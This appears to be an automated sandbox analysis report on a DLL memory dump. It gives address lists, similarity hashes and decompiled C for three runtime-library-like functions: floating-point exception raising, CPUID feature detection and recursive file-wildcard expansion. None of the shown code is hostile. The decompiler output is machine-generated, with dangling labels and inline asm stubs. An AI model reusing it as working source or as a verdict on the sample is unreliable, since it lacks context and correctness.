0x6eda3150
0x6eda3151
0x6eda3143
0x6eda3156
0x6eda3159
0x6eda315c
0x6eda3160
0x6eda3162
0x6eda316b
0x6eda316e
0x6eda3171
0x6eda3173
0x6eda317c
0x6eda3184
0x6eda3186
0x6eda318c
0x6eda3191
0x6eda3195
0x6eda319c
0x6eda31a3
0x6eda31aa
0x6eda31b8
0x6eda31bb
0x6eda31bd
0x6eda31c0
0x6eda31c9
0x6eda31cd
0x6eda31ce
0x6eda31c0
0x6eda31d3
0x6eda31d6
0x6eda31d9
0x6eda31dd
0x6eda31e0
0x6eda31e9
0x6eda31ec
0x6eda31ef
0x6eda31f1
0x6eda31fa
0x6eda3202
0x6eda3204
0x6eda3208
0x6eda320c
0x6eda3213
0x6eda321a
0x6eda3221
0x6eda322f
0x6eda3231
0x6eda3233
0x6eda323c
0x6eda3240
0x6eda3241
0x6eda3233
0x6eda3246
0x6eda3249
0x6eda324c
0x6eda3250
0x6eda3252
0x6eda325b
0x6eda325e
0x6eda3261
0x6eda3263
0x6eda326c
0x6eda3274
0x6eda3276
0x6eda327c
0x6eda3286
0x6eda328d
0x6eda328d
0x6eda3295

Strings

KERNEL32.dll, xrefs: 6EDA301B
a, xrefs: 6EDA3033
a, xrefs: 6EDA3068

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: KERNEL32.dll$a$a
API String ID: 0-169099137
Opcode ID: 5646062b2e574f25862b2c3eb5b1bd9277680944ec8bd3a1f6a05a3fd150cec7
Instruction ID: 4ba800da2f4015bdb1244410589a08bc9e53c3f1f8cd86e23422da643dd157bf
Opcode Fuzzy Hash: 5646062b2e574f25862b2c3eb5b1bd9277680944ec8bd3a1f6a05a3fd150cec7
Instruction Fuzzy Hash: 3C811532E451A98FDB04CFB4D0603EDBBF3AF46344F594129D9C1AB285E77596468780

Uniqueness

Uniqueness Score: -1.00%

Function 6EDACE83, Relevance: 1.8, APIs: 1, Instructions: 274
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6EDACE83(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed char _t193;
				signed int _t196;
				signed int _t200;
				signed int _t203;
				void* _t204;
				void* _t207;
				signed int _t210;
				void* _t211;
				signed int _t226;
				unsigned int* _t241;
				signed char _t243;
				signed int* _t251;
				unsigned int* _t257;
				signed int* _t258;
				signed char _t260;
				long _t263;
				signed int* _t266;

				 *(_a4 + 4) = 0;
				_t263 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t243 = _a12;
				if((_t243 & 0x00000010) != 0) {
					_t263 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t243 & 0x00000002) != 0) {
					_t263 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t243 & 0x00000001) != 0) {
					_t263 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t243 & 0x00000004) != 0) {
					_t263 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t243 & 0x00000008) != 0) {
					_t263 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t266 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 +  *_t266) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t266 >> 5) ^  *(_a4 + 8)) & 1;
				_t260 = E6EDAC8AA(_a4);
				if((_t260 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t260 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t260 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t260 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t260 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t266 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffd | 1;
						L26:
						 *_t258 = _t226;
						L29:
						_t175 =  *_t266 & 0x00000300;
						if(_t175 == 0) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffeb | 0x00000008;
							L35:
							 *_t251 = _t178;
							L36:
							_t179 = _a4;
							_t255 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t255 = _a4;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t241;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t241 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t241;
							}
							E6EDAC810(_t255);
							RaiseException(_t263, 0, 1,  &_a4);
							_t257 = _a4;
							_t193 = _t257[2];
							if((_t193 & 0x00000010) != 0) {
								 *_t266 =  *_t266 & 0xfffffffe;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000008) != 0) {
								 *_t266 =  *_t266 & 0xfffffffb;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000004) != 0) {
								 *_t266 =  *_t266 & 0xfffffff7;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000002) != 0) {
								 *_t266 =  *_t266 & 0xffffffef;
								_t193 = _t257[2];
							}
							if((_t193 & 0x00000001) != 0) {
								 *_t266 =  *_t266 & 0xffffffdf;
							}
							_t196 =  *_t257 & 0x00000003;
							if(_t196 == 0) {
								 *_t266 =  *_t266 & 0xfffff3ff;
							} else {
								_t207 = _t196 - 1;
								if(_t207 == 0) {
									_t210 =  *_t266 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t266 = _t210;
									L58:
									_t200 =  *_t257 >> 0x00000002 & 0x00000007;
									if(_t200 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t266 = _t203;
										L65:
										if(_a28 == 0) {
											 *_t241 = _t257[0x14];
										} else {
											 *_t241 = _t257[0x14];
										}
										return _t203;
									}
									_t204 = _t200 - 1;
									if(_t204 == 0) {
										_t203 =  *_t266 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t203 = _t204 - 1;
									if(_t203 == 0) {
										 *_t266 =  *_t266 & 0xfffff3ff;
									}
									goto L65;
								}
								_t211 = _t207 - 1;
								if(_t211 == 0) {
									_t210 =  *_t266 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t211 == 1) {
									 *_t266 =  *_t266 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t251 = _a4;
							_t178 =  *_t251 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t258 = _a4;
						_t226 =  *_t258 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x6edace91
0x6edace98
0x6edace9d
0x6edacea3
0x6edacea6
0x6edaceac
0x6edaceb1
0x6edaceb6
0x6edaceb6
0x6edacebc
0x6edacec1
0x6edacec6
0x6edacec6
0x6edacecd
0x6edaced2
0x6edaced7
0x6edaced7
0x6edacede
0x6edacee3
0x6edacee8
0x6edacee8
0x6edaceef
0x6edacef4
0x6edacef9
0x6edacef9
0x6edacf01
0x6edacf11
0x6edacf23
0x6edacf35
0x6edacf48
0x6edacf5a
0x6edacf62
0x6edacf67
0x6edacf6c
0x6edacf6c
0x6edacf73
0x6edacf78
0x6edacf78
0x6edacf7f
0x6edacf84
0x6edacf84
0x6edacf8b
0x6edacf90
0x6edacf90
0x6edacf97
0x6edacf9c
0x6edacf9c
0x6edacfa6
0x6edacfa8
0x6edacfe2
0x6edacfaa
0x6edacfaf
0x6edacfd3
0x6edacfdb
0x6edacfcf
0x6edacfcf
0x6edacfe5
0x6edacfec
0x6edacfee
0x6edad010
0x6edad018
0x6edad01b
0x6edad01b
0x6edad01d
0x6edad01d
0x6edad028
0x6edad02e
0x6edad033
0x6edad03a
0x6edad074
0x6edad07f
0x6edad085
0x6edad088
0x6edad08b
0x6edad097
0x6edad09f
0x6edad03c
0x6edad03f
0x6edad04b
0x6edad051
0x6edad057
0x6edad05a
0x6edad063
0x6edad063
0x6edad0a2
0x6edad0b0
0x6edad0b6
0x6edad0b9
0x6edad0be
0x6edad0c0
0x6edad0c3
0x6edad0c3
0x6edad0c8
0x6edad0ca
0x6edad0cd
0x6edad0cd
0x6edad0d2
0x6edad0d4
0x6edad0d7
0x6edad0d7
0x6edad0dc
0x6edad0de
0x6edad0e1
0x6edad0e1
0x6edad0e6
0x6edad0e8
0x6edad0e8
0x6edad0f5
0x6edad0f8
0x6edad12f
0x6edad0fa
0x6edad0fa
0x6edad0fd
0x6edad128
0x6edad11d
0x6edad11d
0x6edad131
0x6edad139
0x6edad13c
0x6edad15b
0x6edad160
0x6edad160
0x6edad162
0x6edad167
0x6edad173
0x6edad169
0x6edad16c
0x6edad16c
0x6edad178
0x6edad178
0x6edad13e
0x6edad141
0x6edad150
0x00000000
0x6edad150
0x6edad143
0x6edad146
0x6edad148
0x6edad148
0x00000000
0x6edad146
0x6edad0ff
0x6edad102
0x6edad118
0x00000000
0x6edad118
0x6edad107
0x6edad109
0x6edad109
0x6edad107
0x00000000
0x6edad0f8
0x6edacff5
0x6edad003
0x6edad00b
0x00000000
0x6edad00b
0x6edacff9
0x6edacffe
0x6edacffe
0x00000000
0x6edacff9
0x6edacfb6
0x6edacfc4
0x6edacfcc
0x00000000
0x6edacfcc
0x6edacfba
0x6edacfbf
0x6edacfbf
0x6edacfba

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6EDACE7E,?,?,00000008,?,?,6EDACB12,00000000), ref: 6EDAD0B0

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 8a15224dec67c388e539379e72e30ac2f2e1a08ffb1a918e5d64dbfc254d07cb
Instruction ID: cc405b95e68ee317fba4bc164669ca92083b8285d3ebe9e6d5ce04f333c0eb69
Opcode Fuzzy Hash: 8a15224dec67c388e539379e72e30ac2f2e1a08ffb1a918e5d64dbfc254d07cb
Instruction Fuzzy Hash: 90B11832210609DFD745CF6CC496B557BA0FF45368F258658EAA9CF2A1C335EA92CF40

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA4187, Relevance: 1.6, APIs: 1, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6EDA4187(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x6edc3bdc =  *0x6edc3bdc & 0x00000000;
				 *0x6edc3010 =  *0x6edc3010 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v12 = _v28 ^ 0x49656e69;
				_v8 = _v36 ^ 0x756e6547;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
					L9:
					_t96 =  *0x6edc3be0; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x6edc3be0 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x6edc3010; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x6edc3bdc = 1;
					 *0x6edc3010 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x6edc3bdc = 2;
						 *0x6edc3010 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x6edc3010; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x6edc3bdc = 3;
								 *0x6edc3010 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x6edc3bdc = 5;
									 *0x6edc3010 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x6edc3010 =  *0x6edc3010 | 0x00000040;
										 *0x6edc3bdc = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x6edc3be0; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x6edc3be0 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}

0x6eda4187
0x6eda418a
0x6eda4194
0x6eda41a5
0x6eda4354
0x6eda4357
0x6eda4357
0x6eda41ab
0x6eda41b1
0x6eda41b6
0x6eda41ba
0x6eda41be
0x6eda41bf
0x6eda41c1
0x6eda41c4
0x6eda41c9
0x6eda41d2
0x6eda41e3
0x6eda41ee
0x6eda41f4
0x6eda41f5
0x6eda41fa
0x6eda41fd
0x6eda4202
0x6eda420a
0x6eda420d
0x6eda4210
0x6eda4255
0x6eda4255
0x6eda425b
0x6eda425b
0x6eda4260
0x6eda4261
0x6eda4267
0x6eda4298
0x6eda4269
0x6eda426b
0x6eda426c
0x6eda4271
0x6eda4274
0x6eda4276
0x6eda4279
0x6eda427c
0x6eda427f
0x6eda4282
0x6eda428b
0x6eda4290
0x6eda4290
0x6eda428b
0x6eda429b
0x6eda42a0
0x6eda42a3
0x6eda42ad
0x6eda42b8
0x6eda42be
0x6eda42c1
0x6eda42cb
0x6eda42d6
0x6eda42e2
0x6eda42e5
0x6eda42e8
0x6eda42f3
0x6eda42f8
0x6eda42fa
0x6eda42ff
0x6eda4302
0x6eda430c
0x6eda4314
0x6eda4319
0x6eda4323
0x6eda4331
0x6eda4344
0x6eda434b
0x6eda434b
0x6eda4331
0x6eda4314
0x6eda42f8
0x6eda42d6
0x00000000
0x6eda4353
0x6eda4215
0x6eda421f
0x6eda4244
0x6eda424a
0x6eda424d
0x00000000
0x00000000
0x00000000
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6EDA419D

Memory Dump Source

Source File: 00000000.00000002.1207096744.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true

Associated: 00000000.00000002.1207084548.000000006EDA0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207123522.000000006EDAE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1207180173.000000006EDC3000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1207200267.000000006EDC7000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 54f833ce2af220856f8692eef1acafd33812f28289d9bdaf6a969d6a01605618
Instruction ID: 82d800ca9a67e11472cff1638dac88b936ee8d4693abc3c31e307ad77b5d1f61
Opcode Fuzzy Hash: 54f833ce2af220856f8692eef1acafd33812f28289d9bdaf6a969d6a01605618
Instruction Fuzzy Hash: 0451AEB2A00606CFEB14CF99C59979EBBF5FB45740F20846AD625EB244D774EA02CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6EDA6F26, Relevance: 1.6, APIs: 1, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6EDA6F26(void* __ecx, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				signed int _v8;
				signed int _v12;
				union _FINDEX_INFO_LEVELS _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				intOrPtr* _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				union _FINDEX_INFO_LEVELS _v636;
				signed int _v640;
				signed int _v644;
				union _FINDEX_INFO_LEVELS _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				signed int _v664;
				union _FINDEX_INFO_LEVELS _v668;
				union _FINDEX_INFO_LEVELS _v672;
				void* __ebx;
				void* __edi;
				intOrPtr _t68;
				signed int _t73;
				signed int _t75;
				char _t77;
				signed char _t78;
				signed int _t84;
				signed int _t94;
				signed int _t97;
				union _FINDEX_INFO_LEVELS _t98;
				union _FINDEX_INFO_LEVELS _t100;
				intOrPtr* _t106;
				signed int _t109;
				intOrPtr _t116;
				signed int _t118;
				signed int _t121;
				signed int _t123;
				void* _t126;
				union _FINDEX_INFO_LEVELS _t127;
				void* _t128;
				intOrPtr* _t130;
				intOrPtr* _t133;
				signed int _t135;
				intOrPtr* _t138;
				signed int _t143;
				signed int _t149;
				void* _t155;
				signed int _t158;
				intOrPtr _t160;
				void* _t161;
				void* _t165;
				void* _t166;
				signed int _t167;
				signed int _t170;
				void* _t171;
				signed int _t172;
				void* _t173;
				void* _t174;

				_push(__ecx);
				_t133 = _a4;
				_t2 = _t133 + 1; // 0x1
				_t155 = _t2;
				do {
					_t68 =  *_t133;
					_t133 = _t133 + 1;
				} while (_t68 != 0);
				_t158 = _a12;
				_t135 = _t133 - _t155 + 1;
				_v8 = _t135;
				if(_t135 <=  !_t158) {
					_push(__esi);
					_t5 = _t158 + 1; // 0x1
					_t126 = _t5 + _t135;
					_t165 = E6EDA6AE6(_t126, 1);
					__eflags = _t158;
					if(_t158 == 0) {
						L7:
						_push(_v8);
						_t126 = _t126 - _t158;
						_t73 = E6EDA9A57(_t165 + _t158, _t126, _a4);
						_t172 = _t171 + 0x10;
						__eflags = _t73;
						if(_t73 != 0) {
							goto L12;
						} else {
							_t130 = _a16;
							_t118 = E6EDA7327(_t130);
							_v8 = _t118;
							__eflags = _t118;
							if(_t118 == 0) {
								 *( *(_t130 + 4)) = _t165;
								_t167 = 0;
								_t14 = _t130 + 4;
								 *_t14 =  *(_t130 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E6EDA6B43(_t165);
								_t167 = _v8;
							}
							E6EDA6B43(0);
							_t121 = _t167;
							goto L4;
						}
					} else {
						_push(_t158);
						_t123 = E6EDA9A57(_t165, _t126, _a8);
						_t172 = _t171 + 0x10;
						__eflags = _t123;
						if(_t123 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E6EDA6A26();
							asm("int3");
							_t170 = _t172;
							_t173 = _t172 - 0x298;
							_t75 =  *0x6edc3004; // 0x8da52076
							_v48 = _t75 ^ _t170;
							_t138 = _v32;
							_t156 = _v28;
							_push(_t126);
							_push(0);
							_t160 = _v36;
							_v648 = _t156;
							__eflags = _t138 - _t160;
							if(_t138 != _t160) {
								while(1) {
									_t116 =  *_t138;
									__eflags = _t116 - 0x2f;
									if(_t116 == 0x2f) {
										break;
									}
									__eflags = _t116 - 0x5c;
									if(_t116 != 0x5c) {
										__eflags = _t116 - 0x3a;
										if(_t116 != 0x3a) {
											_t138 = E6EDA9AB0(_t160, _t138);
											__eflags = _t138 - _t160;
											if(_t138 != _t160) {
												continue;
											}
										}
									}
									break;
								}
								_t156 = _v612;
							}
							_t77 =  *_t138;
							_v605 = _t77;
							__eflags = _t77 - 0x3a;
							if(_t77 != 0x3a) {
								L23:
								_t127 = 0;
								__eflags = _t77 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t78 = 1;
								} else {
									__eflags = _t77 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t77 - 0x3a;
										_t78 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v672 = _t127;
								_v668 = _t127;
								_push(_t165);
								asm("sbb eax, eax");
								_v664 = _t127;
								_v660 = _t127;
								_v640 =  ~(_t78 & 0x000000ff) & _t138 - _t160 + 0x00000001;
								_v656 = _t127;
								_v652 = _t127;
								_t84 = E6EDA6D16(_t138 - _t160 + 1, _t160,  &_v672, E6EDA7232(_t156, __eflags));
								_t174 = _t173 + 0xc;
								asm("sbb eax, eax");
								_t166 = FindFirstFileExW( !( ~_t84) & _v664, _t127,  &_v604, _t127, _t127, _t127);
								__eflags = _t166 - 0xffffffff;
								if(_t166 != 0xffffffff) {
									_t143 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t143;
									_t144 = _t143 >> 2;
									_v644 = _t143 >> 2;
									do {
										_v636 = _t127;
										_v632 = _t127;
										_v628 = _t127;
										_v624 = _t127;
										_v620 = _t127;
										_v616 = _t127;
										_t94 = E6EDA6C47( &(_v604.cFileName),  &_v636,  &_v605, E6EDA7232(_t156, __eflags));
										_t174 = _t174 + 0x10;
										asm("sbb eax, eax");
										_t97 =  !( ~_t94) & _v628;
										__eflags =  *_t97 - 0x2e;
										if( *_t97 != 0x2e) {
											L34:
											_push(_v612);
											_t98 = E6EDA6F26(_t144, _t166, _t97, _t160, _v640);
											_t174 = _t174 + 0x10;
											_v648 = _t98;
											__eflags = _t98;
											if(_t98 != 0) {
												__eflags = _v616 - _t127;
												if(_v616 != _t127) {
													E6EDA6B43(_v628);
													_t98 = _v648;
												}
												_t127 = _t98;
											} else {
												goto L35;
											}
										} else {
											_t144 =  *((intOrPtr*)(_t97 + 1));
											__eflags = _t144;
											if(_t144 == 0) {
												goto L35;
											} else {
												__eflags = _t144 - 0x2e;
												if(_t144 != 0x2e) {
													goto L34;
												} else {
													__eflags =  *((intOrPtr*)(_t97 + 2)) - _t127;
													if( *((intOrPtr*)(_t97 + 2)) == _t127) {
														goto L35;
													} else {
														goto L34;
													}
												}
											}
										}
										L43:
										FindClose(_t166);
										goto L44;
										L35:
										__eflags = _v616 - _t127;
										if(_v616 != _t127) {
											E6EDA6B43(_v628);
											_pop(_t144);
										}
										__eflags = FindNextFileW(_t166,  &_v604);
									} while (__eflags != 0);
									_t106 = _v612;
									_t149 = _v644;
									_t156 =  *_t106;
									_t109 =  *((intOrPtr*)(_t106 + 4)) -  *_t106 >> 2;
									__eflags = _t149 - _t109;
									if(_t149 != _t109) {
										E6EDA9560(_t156, _t156 + _t149 * 4, _t109 - _t149, 4, E6EDA6B7D);
									}
									goto L43;
								} else {
									_push(_v612);
									_t127 = E6EDA6F26( &_v604, _t166, _t160, _t127, _t127);
								}
								L44:
								__eflags = _v652;
								_pop(_t165);
								if(_v652 != 0) {
									E6EDA6B43(_v664);
								}
								_t100 = _t127;
							} else {
								__eflags = _t138 - _t160 + 1;
								if(_t138 == _t160 + 1) {
									_t77 = _v605;
									goto L23;
								} else {
									_push(_t156);
									_t100 = E6EDA6F26(_t138, _t165, _t160, 0, 0);
								}
							}
							_pop(_t161);
							__eflags = _v12 ^ _t170;
							_pop(_t128);
							return E6EDA3753(_t100, _t128, _v12 ^ _t170, _t156, _t161, _t165);
						} else {
							goto L7;
						}
					}
				} else {
					_t121 = 0xc;
					L4:
					return _t121;
				}
			}

0x6eda6f2b
0x6eda6f2c
0x6eda6f2f
0x6eda6f2f
0x6eda6f32
0x6eda6f32
0x6eda6f34
0x6eda6f35
0x6eda6f3a
0x6eda6f41
0x6eda6f44
0x6eda6f49
0x6eda6f54
0x6eda6f55
0x6eda6f58
0x6eda6f62
0x6eda6f66
0x6eda6f68
0x6eda6f7c
0x6eda6f7c
0x6eda6f7f
0x6eda6f89
0x6eda6f8e
0x6eda6f91
0x6eda6f93
0x00000000
0x6eda6f95
0x6eda6f95
0x6eda6f9a
0x6eda6fa1
0x6eda6fa4
0x6eda6fa6
0x6eda6fb7
0x6eda6fb9
0x6eda6fbb
0x6eda6fbb
0x6eda6fbb
0x6eda6fa8
0x6eda6fa9
0x6eda6fae
0x6eda6fb1
0x6eda6fc0
0x6eda6fc6
0x00000000
0x6eda6fc9
0x6eda6f6a
0x6eda6f6a
0x6eda6f70
0x6eda6f75
0x6eda6f78
0x6eda6f7a
0x6eda6fcc
0x6eda6fce
0x6eda6fcf
0x6eda6fd0
0x6eda6fd1
0x6eda6fd2
0x6eda6fd3
0x6eda6fd8
0x6eda6fdc
0x6eda6fde
0x6eda6fe4
0x6eda6feb
0x6eda6fee
0x6eda6ff1
0x6eda6ff4
0x6eda6ff5
0x6eda6ff6
0x6eda6ff9
0x6eda6fff
0x6eda7001
0x6eda7003
0x6eda7003
0x6eda7005
0x6eda7007
0x00000000
0x00000000
0x6eda7009
0x6eda700b
0x6eda700d
0x6eda700f
0x6eda701a
0x6eda701c
0x6eda701e
0x00000000
0x00000000
0x6eda701e
0x6eda700f
0x00000000
0x6eda700b
0x6eda7020
0x6eda7020
0x6eda7026
0x6eda7028
0x6eda702e
0x6eda7030
0x6eda7052
0x6eda7052
0x6eda7054
0x6eda7056
0x6eda7062
0x6eda7062
0x6eda7058
0x6eda7058
0x6eda705a
0x00000000
0x6eda705c
0x6eda705c
0x6eda705e
0x6eda7060
0x00000000
0x00000000
0x6eda7060
0x6eda705a
0x6eda706a
0x6eda7072
0x6eda7078
0x6eda7079
0x6eda707b
0x6eda7083
0x6eda7089
0x6eda708f
0x6eda7095
0x6eda70a9
0x6eda70ae
0x6eda70b9
0x6eda70cf
0x6eda70d1
0x6eda70d4
0x6eda70f7
0x6eda70f7
0x6eda70f9
0x6eda70fc
0x6eda7102
0x6eda7102
0x6eda7108
0x6eda710e
0x6eda7114
0x6eda711a
0x6eda7120
0x6eda7141
0x6eda7146
0x6eda714b
0x6eda714f
0x6eda7155
0x6eda7158
0x6eda716b
0x6eda716b
0x6eda7179
0x6eda717e
0x6eda7181
0x6eda7187
0x6eda7189
0x6eda71e7
0x6eda71ed
0x6eda71f5
0x6eda71fa
0x6eda7200
0x6eda7201
0x00000000
0x00000000
0x00000000
0x6eda715a
0x6eda715a
0x6eda715d
0x6eda715f
0x00000000
0x6eda7161
0x6eda7161
0x6eda7164
0x00000000
0x6eda7166
0x6eda7166
0x6eda7169
0x00000000
0x00000000
0x00000000
